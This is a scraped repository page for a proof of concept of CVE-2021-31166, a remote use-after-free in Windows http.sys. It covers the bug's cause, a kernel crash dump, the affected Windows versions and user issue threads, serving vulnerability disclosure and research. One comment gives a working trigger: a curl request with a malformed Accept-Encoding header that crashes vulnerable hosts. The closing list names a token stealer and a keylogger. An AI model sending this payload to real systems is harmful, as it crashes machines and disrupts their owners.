Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.

Last update: Dec 18, 2022

Overview

CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability

This is a proof of concept for CVE-2021-31166 ("HTTP Protocol Stack Remote Code Execution Vulnerability"), a use-after-free dereference in http.sys patched by Microsoft in May 2021. According to this tweet the vulnerability has been found by @_mxms and @fzzyhd1.

The bug itself happens in http!UlpParseContentCoding where the function has a local LIST_ENTRY and appends item to it. When it's done, it moves it into the Request structure; but it doesn't NULL out the local list. The issue with that is that an attacker can trigger a code-path that frees every entries of the local list leaving them dangling in the Request object.

Here is the bugcheck:

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000003,0xFFFFF90EA867EE40,0xFFFFF90EA867ED98,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`19410c50 cc              int     3

kd> kp
 # Child-SP          RetAddr               Call Site
00 fffff90e`a867e368 fffff804`19525382     nt!DbgBreakPointWithStatus
01 fffff90e`a867e370 fffff804`19524966     nt!KiBugCheckDebugBreak+0x12
02 fffff90e`a867e3d0 fffff804`19408eb7     nt!KeBugCheck2+0x946
03 fffff90e`a867eae0 fffff804`1941ad69     nt!KeBugCheckEx+0x107
04 fffff90e`a867eb20 fffff804`1941b190     nt!KiBugCheckDispatch+0x69
05 fffff90e`a867ec60 fffff804`19419523     nt!KiFastFailDispatch+0xd0
06 fffff90e`a867ee40 fffff804`1db3f677     nt!KiRaiseSecurityCheckFailure+0x323
07 fffff90e`a867efd0 fffff804`1daf6c05     HTTP!UlFreeUnknownCodingList+0x63
08 fffff90e`a867f000 fffff804`1dacd201     HTTP!UlpParseAcceptEncoding+0x299c5
09 fffff90e`a867f0f0 fffff804`1daa93d8     HTTP!UlAcceptEncodingHeaderHandler+0x51
0a fffff90e`a867f140 fffff804`1daa8ab7     HTTP!UlParseHeader+0x218
0b fffff90e`a867f240 fffff804`1da04c5f     HTTP!UlParseHttp+0xac7
0c fffff90e`a867f3a0 fffff804`1da0490a     HTTP!UlpParseNextRequest+0x1ff
0d fffff90e`a867f4a0 fffff804`1daa48c2     HTTP!UlpHandleRequest+0x1aa
0e fffff90e`a867f540 fffff804`1932ae85     HTTP!UlpThreadPoolWorker+0x112
0f fffff90e`a867f5d0 fffff804`19410408     nt!PspSystemThreadStartup+0x55
10 fffff90e`a867f620 00000000`00000000     nt!KiStartSystemThread+0x28

kd> !analyze -v
[...]
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure.  The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: fffff90ea867ee40, Address of the trap frame for the exception that caused the BugCheck
Arg3: fffff90ea867ed98, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved

Frequently Asked Questions

Q: Is Windows Remote Management (WinRM) affected?

Yes (thanks to @JimDinMN for sharing his experiments).

Q: Is Web Services on Devices (WSDAPI) affected?

Yes (thanks to @HenkPoley for sharing his results).

Q: What are the affected versions of Windows?

According to Microsoft's documentation, here are the affected platforms:

Windows Server, version 2004 (or 20H1) (Server Core installation),
Windows 10 Version 2004 (or 20H1) for ARM64/x64/32-bit Systems,
Windows Server, version 20H2 (Server Core Installation),
Windows 10 Version 20H2 for ARM64/x64/32-bit Systems.

Comments

SyntaxError: invalid syntax

D:\git\Vulnerability\CVE\CVE-2021-31166>C:\python27\python.exe cve-2021-31166.py --target=172.23.240.1 File "cve-2021-31166.py", line 9 r = requests.get(f'http://{args.target}/', headers = { ^ SyntaxError: invalid syntax

D:\git\Vulnerability\CVE\CVE-2021-31166>

opened by kouzhudong 5
Connection timed out

On Linux the command python3 cve-2021-31166.py --target=192.168.0.112 hangs then fails with connection timed out error. Target is a Windows 10 20H2 64 bit machine that (I believe) wasn't updated in 3 weeks. Does that mean it isn't vulnerable?

opened by trivia211 4
Update cve-2021-31166.py

Hello dear friend, I have to admit that the idea for this exploit is simply brilliant. Dear friend, I've made a little update, for this good decision... If you want it of course... KR @nu11secur1ty S.A.I.E

opened by nu11secur1ty 3
Could you possibly mentioned version number?

I am using Windows 10 Version IIS version 20H2 for x64 Systems. and when I am trying PoC and perdform manually using burpsuit. It is showing 400 response. Could you help me out?

Version details

PoC

opened by PunitTailor55 3
Hello! OS Windows-Server-2016-Standard, try: python3 cve-2021-31166.py --target X.X.X.X But <Responce [200]>. This is because OS not from trouble list: Windows Server version 2004 (or 20H1) , Windows 10 Version 2004 (or 20H1), Windows Server, version 20H2, Windows 10 Version 20H2?

opened by Nik100 1
Question - Comment
I think you can use curl to exploit as well. Likely local privilege escalation, since a normal user can register a listener on a high port.

$listener = New-Object System.Net.HttpListener $listener.Prefixes.Add('http://localhost:8080/') $listener.Start() curl.exe -H 'Accept-Encoding: doar-e, ftw, imo, ,' http://localhost:8080/

Also which tool are you using to reverse with, for the images? Very cool

Cheers
opened by ghost 1

Releases(v1)

v1(May 21, 2021)

http.sys (for Windows 2004 x64) after the April 2021 Update & http.sys (for Windows 2004 x64) after the May 2021 Update.
Source code(tar.gz)
Source code(zip)
win_2004.http.rel0421.sys(1.50 MB)
win_2004.http.rel0521.sys(1.50 MB)

Owner

Axel Souchet

GitHub Repository

Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.

Related tags

Overview

CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability

Frequently Asked Questions

Comments

SyntaxError: invalid syntax

Connection timed out

Update cve-2021-31166.py

Could you possibly mentioned version number?

Question - Comment

Releases(v1)

v1(May 21, 2021)

Owner

Axel Souchet

Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228

Proof of concept GnuCash Webinterface

EyeJo是一款自动化资产风险评估平台，可以协助甲方安全人员或乙方安全人员对授权的资产中进行排查，快速发现存在的薄弱点和攻击面。

Confluence OGNL injection

IDA scripts for hypervisor (Hyper-v) analysis and reverse engineering automation

Internationalized Domain Names for Python (IDNA 2008 and UTS #46)

Obfuscate your Python scripts better, faster.

Fat-Stealer is a stealer that allows you to grab the Discord token from a user and open a backdoor in his machine.

Bilgi Sistemleri Projesi için yapılan keylogger

MainCoon - an automated recon framework

Find exposed API keys based on RegEx and get exploitation methods for some of keys that are found

BurpSuite Extension: Log4j2 RCE Scanner

Whois-Python - Get Whois Domain with Python GUI

Operational information regarding the vulnerability in the Log4j logging library.

Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

A Tool for subdomain scan with other tools

Fuzzercorn - Bring libfuzzer to Unicorn

Android Malware Behavior Deleter

宝塔面板Windows版提权方法